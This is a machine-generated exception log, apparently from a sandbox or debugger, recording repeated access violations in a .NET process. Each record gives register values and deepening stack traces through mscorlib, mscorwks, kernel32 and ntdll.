registers.ecx: 0
registers.edx: 90825768
registers.ebx: 40148980
registers.esp: 90825768
registers.ebp: 90825800
registers.esi: 40146668
registers.edi: 0
stacktrace:
0x840f3a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545371.15675
__exception__
exception.address: 0x8412fe
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 43 c9 aa 6c eb 11 8b c8 e8 a2 43 e9 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 0
registers.ecx: 0
registers.edx: 0
registers.ebx: 40148980
registers.esp: 90825592
registers.ebp: 90825624
registers.esi: 40146668
registers.edi: 0
stacktrace:
0x840f3a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545371.15675
__exception__
exception.address: 0x84131e
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 23 c9 aa 6c eb 11 8b c8 e8 82 43 e9 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 8655640
registers.ecx: 0
registers.edx: 90825592
registers.ebx: 40148980
registers.esp: 90825592
registers.ebp: 90825624
registers.esi: 40146668
registers.edi: 0
stacktrace:
0x840f3a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545372.68775
__exception__
exception.address: 0x8412fe
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 43 c9 aa 6c eb 11 8b c8 e8 a2 43 e9 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 0
registers.ecx: 0
registers.edx: 0
registers.ebx: 40148980
registers.esp: 90825416
registers.ebp: 90825448
registers.esi: 40146668
registers.edi: 0
stacktrace:
0x840f3a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545372.68775
__exception__
exception.address: 0x84131e
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 23 c9 aa 6c eb 11 8b c8 e8 82 43 e9 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 8655640
registers.ecx: 0
registers.edx: 90825416
registers.ebx: 40148980
registers.esp: 90825416
registers.ebp: 90825448
registers.esi: 40146668
registers.edi: 0
stacktrace:
0x840f3a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545398.26575
__exception__
exception.address: 0x8412fe
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 43 c9 aa 6c eb 11 8b c8 e8 a2 43 e9 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 0
registers.ecx: 0
registers.edx: 0
registers.ebx: 40148980
registers.esp: 90825240
registers.ebp: 90825272
registers.esi: 40146668
registers.edi: 0
stacktrace:
0x840f3a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545398.26575
__exception__
exception.address: 0x84131e
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 23 c9 aa 6c eb 11 8b c8 e8 82 43 e9 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 8655640
registers.ecx: 0
registers.edx: 90825240
registers.ebx: 40148980
registers.esp: 90825240
registers.ebp: 90825272
registers.esi: 40146668
registers.edi: 0
stacktrace:
0x840f3a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545399.78175
__exception__
exception.address: 0x8412fe
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 43 c9 aa 6c eb 11 8b c8 e8 a2 43 e9 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 0
registers.ecx: 0
registers.edx: 0
registers.ebx: 40148980
registers.esp: 90825064
registers.ebp: 90825096
registers.esi: 40146668
registers.edi: 0
stacktrace:
0x840f3a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545399.78175
__exception__
exception.address: 0x84131e
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 23 c9 aa 6c eb 11 8b c8 e8 82 43 e9 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 8655640
registers.ecx: 0
registers.edx: 90825064
registers.ebx: 40148980
registers.esp: 90825064
registers.ebp: 90825096
registers.esi: 40146668
registers.edi: 0
stacktrace:
0x840f3a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545401.29675
__exception__
exception.address: 0x8412fe
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 43 c9 aa 6c eb 11 8b c8 e8 a2 43 e9 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 0
registers.ecx: 0
registers.edx: 0
registers.ebx: 40148980
registers.esp: 90824888
registers.ebp: 90824920
registers.esi: 40146668
registers.edi: 0
stacktrace:
0x840f3a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545401.31275
__exception__
exception.address: 0x84131e
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 23 c9 aa 6c eb 11 8b c8 e8 82 43 e9 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 8655640
registers.ecx: 0
registers.edx: 90824888
registers.ebx: 40148980
registers.esp: 90824888
registers.ebp: 90824920
registers.esi: 40146668
registers.edi: 0
stacktrace:
0x840f3a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545402.84375
__exception__
exception.address: 0x8412fe
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 43 c9 aa 6c eb 11 8b c8 e8 a2 43 e9 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 0
registers.ecx: 0
registers.edx: 0
registers.ebx: 40148980
registers.esp: 90824712
registers.ebp: 90824744
registers.esi: 40146668
registers.edi: 0
stacktrace:
0x840f3a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
